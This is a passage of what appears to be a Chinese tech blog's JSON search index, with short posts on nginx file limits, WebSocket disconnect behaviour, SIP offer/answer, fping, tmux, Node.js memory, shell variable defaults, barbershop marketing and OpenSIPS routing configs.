","permalink":"https://wdd.js.org/posts/2020/06/rlmqq8/","summary":"最近遇到一个问题,WebSocket总是会在下午出现比较大的断开的量。\n首先怀疑的是客户端的网络到服务端的网络出现抖动或者断开,要么就是入口的nginx有异常,或者是内部的服务出现异常。\n排查下来,发现nginx的最大打开文件个数是1024\nnginx master进程\nnginx work进程\n当进程打开文件数超过限制时,会发生什么? 当进程超过最大打开文件限制时,会收到SIGXFSZ信号。这个信号会默认行为会杀死一个进程。进程内部也可以捕获这个信号。\n我试着向nginx wrok进程发送SIGXFSZ信号, work进程会退出,然后master监听了这个事件后,会重新启动一个work进程。\nkill -XFSZ work_pid 在nginx的error.log文件中,可以看到类似的日志输出。\n这里的25就是XFSZ信号的整数表示。\n... [alert] ...#.: work process ... exited on signal 25 _\n参考 https://www.monitis.com/blog/6-best-practices-for-optimizing-your-nginx-performance/ https://www.cnblogs.com/shansongxian/p/9989631.html https://www.cnblogs.com/jpfss/p/9755706.html https://man7.org/linux/man-pages/man2/getrlimit.2.html https://man7.org/linux/man-pages/man5/proc.5.html ","title":"生产环境nginx配置"},{"content":"调研目的 在异常情况下,网络断开对WebSocket的影响 测试代码 测试代码没有心跳机制 心跳机制并不包含在WebSocket协议内部 var ws = new WebSocket(\u0026#39;wss://echo.websocket.org/\u0026#39;) ws.onopen =function(e){ console.log(\u0026#39;onopen\u0026#39;) } ws.onerror = function (e) { console.log(\u0026#39;onerror: \u0026#39; + e.code) console.log(e) } ws.onclose = function (e) { console.log(\u0026#39;onclose: \u0026#39; + e.code) console.log(e) } 场景1: 断网后,是否会立即触发onerror, 或者onclose事件? 答案:不会立即触发\n测试代码中没有心跳机制,断网后,并不会立即触发onerror或者onclose的回调函数。\n个人测试的情况\n及其 测试场景 Macbook pro chrome 83.0.4103.106 每隔10秒发送一次消息的情况下,40秒后出发onclose事件 Macbook pro chrome 83.0.4103.106 一直不发送消息,一直就不回出发onclose事件 Macbook pro chrome 83.0.4103.106 发出一个消息后? 场景2: 断网后,使用send()发送数据,回触发事件吗? 为什么无法准确拿到断开原因? WebSocket关闭事件中有三个属性\ncode 断开原因码 reason 具体原因 wasClean 是否是正常断开 官方文档上,code字段有很多个值。但是大多数情况下,要么拿到的值是undefined, 要么是1006,基本上没有其他情况。\n这并不是浏览器的bug, 这是浏览器故意这样做的。在w3c的官方文档上给出的原因其实是处于安全的考虑。\n试想一下,如果把断开原因给出的非常具体。那么一个恶意的js脚本就有可能做端口扫描或则恶意的注入。\nUser agents must not convey any failure information to scripts in a way that would allow a script to distinguish the following situations:\nA server whose host name could not be resolved.\nA server to which packets could not successfully be routed.\nA server that refused the connection on the specified port.\nA server that failed to correctly perform a TLS handshake (e.g., the server certificate can\u0026rsquo;t be verified).\nA server that did not complete the opening handshake (e.g. because it was not a WebSocket server).\nA WebSocket server that sent a correct opening handshake, but that specified options that caused the client to drop the connection (e.g. the server specified a subprotocol that the client did not offer).\nA WebSocket server that abruptly closed the connection after successfully completing the opening handshake.\nIn all of these cases, the the WebSocket connection close code would be 1006, as required by the WebSocket Protocol specification. [WSP]\nAllowing a script to distinguish these cases would allow a script to probe the user\u0026rsquo;s local network in preparation for an attack. https://www.w3.org/TR/websockets/%23concept-websocket-close-fail\n","permalink":"https://wdd.js.org/posts/2020/06/sbhglg/","summary":"调研目的 在异常情况下,网络断开对WebSocket的影响 测试代码 测试代码没有心跳机制 心跳机制并不包含在WebSocket协议内部 var ws = new WebSocket(\u0026#39;wss://echo.websocket.org/\u0026#39;) ws.onopen =function(e){ console.log(\u0026#39;onopen\u0026#39;) } ws.onerror = function (e) { console.log(\u0026#39;onerror: \u0026#39; + e.code) console.log(e) } ws.onclose = function (e) { console.log(\u0026#39;onclose: \u0026#39; + e.code) console.log(e) } 场景1: 断网后,是否会立即触发onerror, 或者onclose事件? 答案:不会立即触发\n测试代码中没有心跳机制,断网后,并不会立即触发onerror或者onclose的回调函数。\n个人测试的情况\n及其 测试场景 Macbook pro chrome 83.0.4103.106 每隔10秒发送一次消息的情况下,40秒后出发onclose事件 Macbook pro chrome 83.0.4103.106 一直不发送消息,一直就不回出发onclose事件 Macbook pro chrome 83.0.4103.106 发出一个消息后? 场景2: 断网后,使用send()发送数据,回触发事件吗? 为什么无法准确拿到断开原因? WebSocket关闭事件中有三个属性\ncode 断开原因码 reason 具体原因 wasClean 是否是正常断开 官方文档上,code字段有很多个值。但是大多数情况下,要么拿到的值是undefined, 要么是1006,基本上没有其他情况。","title":"[未完成] WebSocket调研"},{"content":"一般的sip网关同时具有信令和媒体处理的能力,如下图。\n但是也有信令和媒体分开的网关。在和网关信令交互过程中,网关会将媒体地址放到sdp中。\n难点就来了,在nat存在的场景下,你并不知道sdp里的媒体地址是否是真实的地址。\n那么你就要选择,是相信sdp中的媒体地址,还是把sip信令的源ip作为媒体地址呢?\n","permalink":"https://wdd.js.org/opensips/ch1/sip-rtp-path/","summary":"一般的sip网关同时具有信令和媒体处理的能力,如下图。\n但是也有信令和媒体分开的网关。在和网关信令交互过程中,网关会将媒体地址放到sdp中。\n难点就来了,在nat存在的场景下,你并不知道sdp里的媒体地址是否是真实的地址。\n那么你就要选择,是相信sdp中的媒体地址,还是把sip信令的源ip作为媒体地址呢?","title":"媒体路径与信令路径"},{"content":"1. 简介 媒体协商用来交换呼叫双方的媒体能力。如\n支持的编码类型有哪些 采样频率是多少 媒体端口,ip 信息 \u0026hellip; 媒体协商使用的是请求和应答模型。即一方向另一方发送含有 sdp 信息的消息,然后另一方更具对方提供的编码以及自己支持的编码,如果协商成功,则将协商后的消息 sdp 再次发送给对方。\n2. 常见的几个协商方式 2.1 在 INVITE 中 offer 2.2 在 200 OK 中 offer 2.3 在 UPDATE 中 offer 2.4 在 PRACK 中 offer 3. 常见的几个问题 一般呼叫到中继测时,中继回的 183 信令是会携带 sdp 信息的 一般打到分机时,分机回的 180 信令是没有 sdp 信息的 不要先入为主的认为,某些请求一定带有 sdp,某些请求一定没有 sdp。而应当去测试请求或者响应消息上有没有携带 sdp 信息。\n携带 sdp 信息的 sip 消息会出现下面的头\nContent-Type: application/sdp ","permalink":"https://wdd.js.org/opensips/ch1/offer-answer/","summary":"1. 简介 媒体协商用来交换呼叫双方的媒体能力。如\n支持的编码类型有哪些 采样频率是多少 媒体端口,ip 信息 \u0026hellip; 媒体协商使用的是请求和应答模型。即一方向另一方发送含有 sdp 信息的消息,然后另一方更具对方提供的编码以及自己支持的编码,如果协商成功,则将协商后的消息 sdp 再次发送给对方。\n2. 常见的几个协商方式 2.1 在 INVITE 中 offer 2.2 在 200 OK 中 offer 2.3 在 UPDATE 中 offer 2.4 在 PRACK 中 offer 3. 常见的几个问题 一般呼叫到中继测时,中继回的 183 信令是会携带 sdp 信息的 一般打到分机时,分机回的 180 信令是没有 sdp 信息的 不要先入为主的认为,某些请求一定带有 sdp,某些请求一定没有 sdp。而应当去测试请求或者响应消息上有没有携带 sdp 信息。\n携带 sdp 信息的 sip 消息会出现下面的头\nContent-Type: application/sdp ","title":"媒体协商 offer/answer模型"},{"content":"Decode As Udp wireshark 有时候并不能把udp包识别为rtp包,所以这边可能需要手动设置解码方式\n","permalink":"https://wdd.js.org/opensips/tools/wireshark-player-pcap/","summary":"Decode As Udp wireshark 有时候并不能把udp包识别为rtp包,所以这边可能需要手动设置解码方式","title":"wireshark 播放抓包文件"},{"content":"新建一个文件 ip.list.cfg, 包含所有的带测试的ip地址。\n192.168.40.20 192.168.40.21 执行命令:\nnohup fping -D -u -l -p 2000 -f ip.list.cfg \u0026amp; -D 显示时间戳 -u 显示不可达的目标 -l 持续的ping -p 每隔多少毫秒执行一次 -f 指定ip列表文件 在nohup.out中,回持续的显示到各个ip的网络状况。\n[1592643928.961414] 192.168.40.20 : [0], 84 bytes, 3.22 ms (3.22 avg, 0% loss) [1592643928.969987] 192.168.40.21 : [0], 84 bytes, 1.22 ms (1.22 avg, 0% loss) [1592643930.965753] 192.168.40.20 : [1], 84 bytes, 5.25 ms (4.23 avg, 0% loss) [1592643930.972833] 192.168.40.21 : [1], 84 bytes, 1.14 ms (1.18 avg, 0% loss) [1592643932.965636] 192.168.40.20 : [2], 84 bytes, 3.45 ms (3.97 avg, 0% loss) [1592643932.978245] 192.168.40.21 : [2], 84 bytes, 4.39 ms (2.25 avg, 0% loss) [1592643934.991354] 192.168.40.20 : [3], 84 bytes, 27.9 ms (9.96 avg, 0% loss) [1592643934.991621] 192.168.40.21 : [3], 84 bytes, 14.9 ms (5.42 avg, 0% loss) [1592643936.978135] 192.168.40.20 : [4], 84 bytes, 11.3 ms (10.2 avg, 0% loss) [1592643936.979620] 192.168.40.21 : [4], 84 bytes, 1.37 ms (4.61 avg, 0% loss) ","permalink":"https://wdd.js.org/posts/2020/06/qtdzvr/","summary":"新建一个文件 ip.list.cfg, 包含所有的带测试的ip地址。\n192.168.40.20 192.168.40.21 执行命令:\nnohup fping -D -u -l -p 2000 -f ip.list.cfg \u0026amp; -D 显示时间戳 -u 显示不可达的目标 -l 持续的ping -p 每隔多少毫秒执行一次 -f 指定ip列表文件 在nohup.out中,回持续的显示到各个ip的网络状况。\n[1592643928.961414] 192.168.40.20 : [0], 84 bytes, 3.22 ms (3.22 avg, 0% loss) [1592643928.969987] 192.168.40.21 : [0], 84 bytes, 1.22 ms (1.22 avg, 0% loss) [1592643930.965753] 192.168.40.20 : [1], 84 bytes, 5.25 ms (4.23 avg, 0% loss) [1592643930.972833] 192.168.40.21 : [1], 84 bytes, 1.14 ms (1.","title":"fping 网络状态监控测试"},{"content":".zshrc配置 vim ~/.zshrc plugins=(git tmux) # 加入tmux, 然后保存退出 source ~/.zshrc tmux 快捷键 Alias Command Description ta tmux attach -t Attach new tmux session to already running named session tad tmux attach -d -t Detach named tmux session ts tmux new-session -s Create a new named tmux session tl tmux list-sessions Displays a list of running tmux sessions tksv tmux kill-server Terminate all running tmux sessions tkss tmux kill-session -t Terminate named running tmux session tmux _zsh_tmux_plugin_run Start a new tmux session ","permalink":"https://wdd.js.org/posts/2020/06/rh9zsc/","summary":".zshrc配置 vim ~/.zshrc plugins=(git tmux) # 加入tmux, 然后保存退出 source ~/.zshrc tmux 快捷键 Alias Command Description ta tmux attach -t Attach new tmux session to already running named session tad tmux attach -d -t Detach named tmux session ts tmux new-session -s Create a new named tmux session tl tmux list-sessions Displays a list of running tmux sessions tksv tmux kill-server Terminate all running tmux sessions tkss tmux kill-session -t Terminate named running tmux session tmux _zsh_tmux_plugin_run Start a new tmux session ","title":"oh-my-zsh 安装 tmux插件"},{"content":"GC释放时机 当HeapUsed接近最大堆内存时,出发GC释放。 下图是深夜,压力比较小的时候。 下图是上午工作时间\n内存泄漏 OOM ","permalink":"https://wdd.js.org/fe/nodejs-gc-times/","summary":"GC释放时机 当HeapUsed接近最大堆内存时,出发GC释放。 下图是深夜,压力比较小的时候。 下图是上午工作时间\n内存泄漏 OOM ","title":"Nodejs Gc Times"},{"content":"","permalink":"https://wdd.js.org/posts/2020/06/elg2v2/","summary":"","title":"Nodejs诊断报告"},{"content":"process.memoryUsage() { rss: 4935680, heapTotal: 1826816, heapUsed: 650472, external: 49879, arrayBuffers: 9386 } heapTotal 和 heapUsed指向V8\u0026rsquo;s 内存使用 external 指向 C++ 对象的内存使用, C++对象绑定js对象,并且由V8管理 rss, 实际占用内存,包括C++, js对象和代码三块的总计。使用 ps aux命令输出时,rss的值对应了RSS列的数值 node js 所有buffer占用的内存 heapTotal and heapUsed refer to V8\u0026rsquo;s memory usage. external refers to the memory usage of C++ objects bound to JavaScript objects managed by V8. rss, Resident Set Size, is the amount of space occupied in the main memory device (that is a subset of the total allocated memory) for the process, including all C++ and JavaScript objects and code. arrayBuffers refers to memory allocated for ArrayBuffers and SharedArrayBuffers, including all Node.js Buffers. This is also included in the external value. When Node.js is used as an embedded library, this value may be 0 because allocations for ArrayBuffers may not be tracked in that case. process.resourceUsage() userCPUTime maps to ru_utime computed in microseconds. It is the same value as process.cpuUsage().user. systemCPUTime maps to ru_stime computed in microseconds. It is the same value as process.cpuUsage().system. maxRSS maps to ru_maxrss which is the maximum resident set size used in kilobytes. sharedMemorySize maps to ru_ixrss but is not supported by any platform. unsharedDataSize maps to ru_idrss but is not supported by any platform. unsharedStackSize maps to ru_isrss but is not supported by any platform. minorPageFault maps to ru_minflt which is the number of minor page faults for the process, see this article for more details. majorPageFault maps to ru_majflt which is the number of major page faults for the process, see this article for more details. This field is not supported on Windows. swappedOut maps to ru_nswap but is not supported by any platform. fsRead maps to ru_inblock which is the number of times the file system had to perform input. fsWrite maps to ru_oublock which is the number of times the file system had to perform output. ipcSent maps to ru_msgsnd but is not supported by any platform. ipcReceived maps to ru_msgrcv but is not supported by any platform. signalsCount maps to ru_nsignals but is not supported by any platform. voluntaryContextSwitches maps to ru_nvcsw which is the number of times a CPU context switch resulted due to a process voluntarily giving up the processor before its time slice was completed (usually to await availability of a resource). This field is not supported on Windows. involuntaryContextSwitches maps to ru_nivcsw which is the number of times a CPU context switch resulted due to a higher priority process becoming runnable or because the current process exceeded its time slice. This field is not supported on Windows. console.log(process.resourceUsage()); /* Will output: { userCPUTime: 82872, systemCPUTime: 4143, maxRSS: 33164, sharedMemorySize: 0, unsharedDataSize: 0, unsharedStackSize: 0, minorPageFault: 2469, majorPageFault: 0, swappedOut: 0, fsRead: 0, fsWrite: 8, ipcSent: 0, ipcReceived: 0, signalsCount: 0, voluntaryContextSwitches: 79, involuntaryContextSwitches: 1 } */ ","permalink":"https://wdd.js.org/fe/nodejs-mem-usage/","summary":"process.memoryUsage() { rss: 4935680, heapTotal: 1826816, heapUsed: 650472, external: 49879, arrayBuffers: 9386 } heapTotal 和 heapUsed指向V8\u0026rsquo;s 内存使用 external 指向 C++ 对象的内存使用, C++对象绑定js对象,并且由V8管理 rss, 实际占用内存,包括C++, js对象和代码三块的总计。使用 ps aux命令输出时,rss的值对应了RSS列的数值 node js 所有buffer占用的内存 heapTotal and heapUsed refer to V8\u0026rsquo;s memory usage. external refers to the memory usage of C++ objects bound to JavaScript objects managed by V8. rss, Resident Set Size, is the amount of space occupied in the main memory device (that is a subset of the total allocated memory) for the process, including all C++ and JavaScript objects and code.","title":"Nodejs Mem Usage"},{"content":"v8内存模型 Code Segment: 代码被实际执行 Stack 本地变量 指向引用的变量 流程控制,例如函数 Heap V8负责管理 HeapTotal 堆的总大小 HeapUsed 实际使用的大小 Shallow size of an object: 对象自身占用的内存 Retained size of an object: 对象及其依赖对象删除后回释放的内存 ","permalink":"https://wdd.js.org/fe/nodejs-memory-model/","summary":"v8内存模型 Code Segment: 代码被实际执行 Stack 本地变量 指向引用的变量 流程控制,例如函数 Heap V8负责管理 HeapTotal 堆的总大小 HeapUsed 实际使用的大小 Shallow size of an object: 对象自身占用的内存 Retained size of an object: 对象及其依赖对象删除后回释放的内存 ","title":"Nodejs Memory Model"},{"content":"从各种层次排查了问题,包括\ndocker版本不一样 脚本不一样 镜像的问题 \u0026hellip; 从各种角度排查过后,却发现,问题在是拼写错误。环境变量没有设置对,导致进程无法前台运行。\n能不拼写就不要拼写!!直接复制。\n大文件在传输图中可能会文件损坏,最好使用md5sum计算文件校验和,然后做对比。\n","permalink":"https://wdd.js.org/posts/2020/06/ghpbm9/","summary":"从各种层次排查了问题,包括\ndocker版本不一样 脚本不一样 镜像的问题 \u0026hellip; 从各种角度排查过后,却发现,问题在是拼写错误。环境变量没有设置对,导致进程无法前台运行。\n能不拼写就不要拼写!!直接复制。\n大文件在传输图中可能会文件损坏,最好使用md5sum计算文件校验和,然后做对比。","title":"解决问题的最后一个思路:拼写错误!!"},{"content":" webrtc的各种demo https://webrtc.github.io/samples/ 在线音频处理 https://audiomass.co/ 值得深入阅读,关于如何demo的思考 https://kitsonkelly.com/posts/deno-is-a-browser-for-code/ 不错的介绍demo的博客 https://kitsonkelly.com/posts js如何获取音频视频 https://www.webdevdrops.com/en/how-to-access-device-cameras-with-javascript/ bats可以用来测试shell脚本 https://github.com/bats-core/bats-core 手绘风格的流程图 https://excalidraw.com/ ","permalink":"https://wdd.js.org/posts/2020/06/gbm9n6/","summary":" webrtc的各种demo https://webrtc.github.io/samples/ 在线音频处理 https://audiomass.co/ 值得深入阅读,关于如何demo的思考 https://kitsonkelly.com/posts/deno-is-a-browser-for-code/ 不错的介绍demo的博客 https://kitsonkelly.com/posts js如何获取音频视频 https://www.webdevdrops.com/en/how-to-access-device-cameras-with-javascript/ bats可以用来测试shell脚本 https://github.com/bats-core/bats-core 手绘风格的流程图 https://excalidraw.com/ ","title":"01 手绘风格的流程图"},{"content":"用法 Parameter What does it do? ${VAR:-STRING} If VAR is empty or unset, use STRING as its value. ${VAR-STRING} If VAR is unset, use STRING as its value. ${VAR:=STRING} If VAR is empty or unset, set the value of VAR to STRING. ${VAR=STRING} If VAR is unset, set the value of VAR to STRING. ${VAR:+STRING} If VAR is not empty, use STRING as its value. ${VAR+STRING} If VAR is set, use STRING as its value. ${VAR:?STRING} Display an error if empty or unset. ${VAR?STRING} Display an error if unset. 例子 执行下面的例子,如果环境变量中 CONF 的值存在,则取 CONF 的值,否则用默认值 7\n#/bin/bash a=${CONF:-\u0026#34;7\u0026#34;} echo $a; ","permalink":"https://wdd.js.org/shell/default-var/","summary":"用法 Parameter What does it do? ${VAR:-STRING} If VAR is empty or unset, use STRING as its value. ${VAR-STRING} If VAR is unset, use STRING as its value. ${VAR:=STRING} If VAR is empty or unset, set the value of VAR to STRING. ${VAR=STRING} If VAR is unset, set the value of VAR to STRING. ${VAR:+STRING} If VAR is not empty, use STRING as its value. ${VAR+STRING} If VAR is set, use STRING as its value.","title":"设置变量默认值"},{"content":"1. 理发店分类 类别 店面大小 并发理发人数 业务范围 消费者画像 定价 A(单一理发类) 较小 4-6 理发、染发、烫发 学生、普通工人 较低 B(综合服务类) 较大 12-20 理发、染发、烫发、美容、减肥、刮痧、按摩、脱毛等等 白领、老板等有一定经济能力者 中上 2. 如何吸引顾客上门? 优惠卡:在理发店营业之前,往往可以以极低的价格,派发理发卡。例如办理20元理发5次这样的理发卡。这样在理发店营业之初,就会有足够的客户上门理发。 认知偏差:很多理发店会门口挂个横幅: x+x+x 仅需5元。全场套餐仅需1折。其实这些都是吸引顾客的钩子,而真正的前提条件,往往是要办理xxxx元的会员卡。 3. 如何吸引客户更多的消费? 对于B类理发店来说,一般情况下顾客进店之后,并不会对其立即理发。而需要一位服务员进行理发前的准备,例如头部按摩、颈部刮痧、肩部按摩的放松准备。也可能会上一些茶水,糖果瓜子之类的食品。\n进入理发店,除了有理发的消费之外,还可能纯在其他的消费机会。而消费机会的前提在于**服务人员和顾客之间的沟通。所以以为能够察言寡色的服务员则显得尤为重要。如果顾客一句话也不说,那也是无法让其更多的消费的。常见的沟通手法如下:\n发现顾客身上的小瑕疵,进而咨询顾客是否需要专业的人员帮您看看。(注意这一步一定不要立即推荐套餐服务,这样会立即引起顾客的反感情绪。) 经过专业人员的查看之后,一般会向客户推荐比较优惠的体验一次的项目。因为体验一次往往是话费比较小的。如果上来给客户推荐一两千的套餐,客户一般会拒绝。 简单的套餐体验过后,可以向顾客推荐套餐,以及如果使用套餐,单次理疗会更加优惠。 总得理念就是:循序渐诱,不可操之过急\n4. 如何留住顾客? 理发店顾客粘性一般比较小,周围四五家理发店,顾客凭什么再次光顾你这家呢?\n答案就是:会员卡\n","permalink":"https://wdd.js.org/posts/2020/05/frut12/","summary":"1. 理发店分类 类别 店面大小 并发理发人数 业务范围 消费者画像 定价 A(单一理发类) 较小 4-6 理发、染发、烫发 学生、普通工人 较低 B(综合服务类) 较大 12-20 理发、染发、烫发、美容、减肥、刮痧、按摩、脱毛等等 白领、老板等有一定经济能力者 中上 2. 如何吸引顾客上门? 优惠卡:在理发店营业之前,往往可以以极低的价格,派发理发卡。例如办理20元理发5次这样的理发卡。这样在理发店营业之初,就会有足够的客户上门理发。 认知偏差:很多理发店会门口挂个横幅: x+x+x 仅需5元。全场套餐仅需1折。其实这些都是吸引顾客的钩子,而真正的前提条件,往往是要办理xxxx元的会员卡。 3. 如何吸引客户更多的消费? 对于B类理发店来说,一般情况下顾客进店之后,并不会对其立即理发。而需要一位服务员进行理发前的准备,例如头部按摩、颈部刮痧、肩部按摩的放松准备。也可能会上一些茶水,糖果瓜子之类的食品。\n进入理发店,除了有理发的消费之外,还可能纯在其他的消费机会。而消费机会的前提在于**服务人员和顾客之间的沟通。所以以为能够察言寡色的服务员则显得尤为重要。如果顾客一句话也不说,那也是无法让其更多的消费的。常见的沟通手法如下:\n发现顾客身上的小瑕疵,进而咨询顾客是否需要专业的人员帮您看看。(注意这一步一定不要立即推荐套餐服务,这样会立即引起顾客的反感情绪。) 经过专业人员的查看之后,一般会向客户推荐比较优惠的体验一次的项目。因为体验一次往往是话费比较小的。如果上来给客户推荐一两千的套餐,客户一般会拒绝。 简单的套餐体验过后,可以向顾客推荐套餐,以及如果使用套餐,单次理疗会更加优惠。 总得理念就是:循序渐诱,不可操之过急\n4. 如何留住顾客? 理发店顾客粘性一般比较小,周围四五家理发店,顾客凭什么再次光顾你这家呢?\n答案就是:会员卡","title":"理发店的营业模式分析"},{"content":"opensips 1.x 使用各种flag去设置一个呼叫是否需要记录。从opensips 2.2开始,不再使用flag的方式,而使用 do_accounting() 函数去标记是否需要记录呼叫。\n注意 do_accounting()函数并不是收到SIP消息后立即写呼叫记录,也仅仅是做一个标记。实际的写数据库或者写日志发生在事务或者dialog完成的时候。\n","permalink":"https://wdd.js.org/opensips/ch6/acc/","summary":"opensips 1.x 使用各种flag去设置一个呼叫是否需要记录。从opensips 2.2开始,不再使用flag的方式,而使用 do_accounting() 函数去标记是否需要记录呼叫。\n注意 do_accounting()函数并不是收到SIP消息后立即写呼叫记录,也仅仅是做一个标记。实际的写数据库或者写日志发生在事务或者dialog完成的时候。","title":"acc呼叫记录模块"},{"content":"# # this example shows how to use forking on failure # log_level=3 log_stderror=1 listen=192.168.2.16 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # skip register for testing purposes if (is_methos(\u0026#34;REGISTER\u0026#34;)) { sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); exit; }; if (is_method(\u0026#34;INVITE\u0026#34;)) { seturi(\u0026#34;sip:xxx@192.168.2.16:5064\u0026#34;); # if transaction broken, try other an alternative route t_on_failure(\u0026#34;1\u0026#34;); # if a provisional came, stop alternating t_on_reply(\u0026#34;1\u0026#34;); }; t_relay(); } failure_route[1] { log(1, \u0026#34;trying at alternate destination\\n\u0026#34;); seturi(\u0026#34;sip:yyy@192.168.2.16:5064\u0026#34;); t_relay(); } onreply_route[1] { log(1, \u0026#34;reply came in\\n\u0026#34;); if ($rs=~\u0026#34;18[0-9]\u0026#34;) { log(1, \u0026#34;provisional -- resetting negative failure\\n\u0026#34;); t_on_failure(\u0026#34;0\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/serial-183/","summary":"# # this example shows how to use forking on failure # log_level=3 log_stderror=1 listen=192.168.2.16 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # skip register for testing purposes if (is_methos(\u0026#34;REGISTER\u0026#34;)) { sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); exit; }; if (is_method(\u0026#34;INVITE\u0026#34;)) { seturi(\u0026#34;sip:xxx@192.","title":"serial_183"},{"content":"# # demo script showing how to set-up usrloc replication # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=yes # (cmd line: -E) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # digest generation secret; use the same in backup server; # also, make sure that the backup server has sync\u0026#39;ed time modparam(\u0026#34;auth\u0026#34;, \u0026#34;secret\u0026#34;, \u0026#34;alsdkhglaksdhfkloiwr\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwars==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # if the request is for other domain use UsrLoc # (in case, it does not work, use the following command # with proper names and addresses in it) if (is_myself(\u0026#34;$rd\u0026#34;)) { if ($rm==\u0026#34;REGISTER\u0026#34;) { # verify credentials if (!www_authorize(\u0026#34;foo.bar\u0026#34;, \u0026#34;subscriber\u0026#34;)) { www_challenge(\u0026#34;foo.bar\u0026#34;, \u0026#34;0\u0026#34;); exit; }; # if ok, update contacts and ... save(\u0026#34;location\u0026#34;); # ... if this REGISTER is not a replica from our # peer server, replicate to the peer server $var(backup_ip) = \u0026#34;backup.foo.bar\u0026#34; {ip.resolve}; if (!$si==$var(backup_ip)) { t_replicate(\u0026#34;sip:backup.foo.bar:5060\u0026#34;); }; exit; }; # do whatever else appropriate for your domain log(\u0026#34;non-REGISTER\\n\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/replicate/","summary":"# # demo script showing how to set-up usrloc replication # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=yes # (cmd line: -E) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # digest generation secret; use the same in backup server; # also, make sure that the backup server has sync\u0026#39;ed time modparam(\u0026#34;auth\u0026#34;, \u0026#34;secret\u0026#34;, \u0026#34;alsdkhglaksdhfkloiwr\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwars==0, or excessively long requests if (!","title":"replicate"},{"content":"# # $Id$ # # this example shows use of ser as stateless redirect server # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if ($rm==\u0026#34;REGISTER\u0026#34;) { log(\u0026#34;REGISTER\u0026#34;); sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); return; }; # rewrite current URI, which is always part of destination ser rewriteuri(\u0026#34;sip:parallel@siphub.net:9\u0026#34;); # append one more URI to the destination ser append_branch(\u0026#34;sip:redirect@siphub.net:9\u0026#34;); # redirect now sl_send_reply(\u0026#34;300\u0026#34;, \u0026#34;Redirect\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch8/redirect/","summary":"# # $Id$ # # this example shows use of ser as stateless redirect server # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if ($rm==\u0026#34;REGISTER\u0026#34;) { log(\u0026#34;REGISTER\u0026#34;); sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); return; }; # rewrite current URI, which is always part of destination ser rewriteuri(\u0026#34;sip:parallel@siphub.net:9\u0026#34;); # append one more URI to the destination ser append_branch(\u0026#34;sip:redirect@siphub.","title":"redirect"},{"content":"# # $Id$ # # example: ser configured as PSTN gateway guard; PSTN gateway is located # at 192.168.0.10 # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule 